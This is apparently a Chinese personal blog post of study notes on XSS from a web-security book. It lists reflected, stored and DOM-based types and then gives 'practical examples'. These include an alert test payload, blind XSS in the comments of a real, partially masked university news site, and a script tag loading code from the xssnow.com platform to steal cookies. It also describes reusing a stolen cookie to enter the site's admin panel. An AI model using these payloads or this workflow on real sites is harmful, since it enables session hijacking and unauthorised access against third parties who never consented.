白帽子讲web安全之3

看到xss章节，很多还是不太懂的，还需要再继续学习javascript等相关的知识，推荐学习网站http://www.w3cschool.cn/，下面的知识点是主要是之前看到过的内容，并附上自己的小实战

xss类型
1. 反射型
2. 存储型
3. DOM Based型
原理：

注：上图来自http://yttitan.blog.51cto.com/70821/1571910

实战例子：

1. 存储式跨站脚本漏洞检测
   在留言内容中填写包含有跨站测试的脚本，提交后观察返回效果。

    <script>alert("XSS TEST")</script>

新闻网能评论的地方都有相应的xss漏洞，下面举例
Url：http://news.*.edu.cn//html/zonghexw/show_8890.html
验证：利用xssnow平台
将如图中的代码写入评论区，即xss盲打

提交评论后弹窗，提交成功，由于需要管理审核要等待，我们可以进行本地触发。
2. 利用存储式跨站漏洞窃取用户cookie
首先将<script src=http://xssnow.com/JoEL></script>将其保存为xsstest.html文件，如下图

然后打开xsstest.html，再到xssnow平台查看项目内容如下图可以得到cookie

3. 利用xss平台 如xssnow、webxss 等获取cookie 然后用阿D浏览网页，修改cookie，然后再刷新网页就是后台管理页面了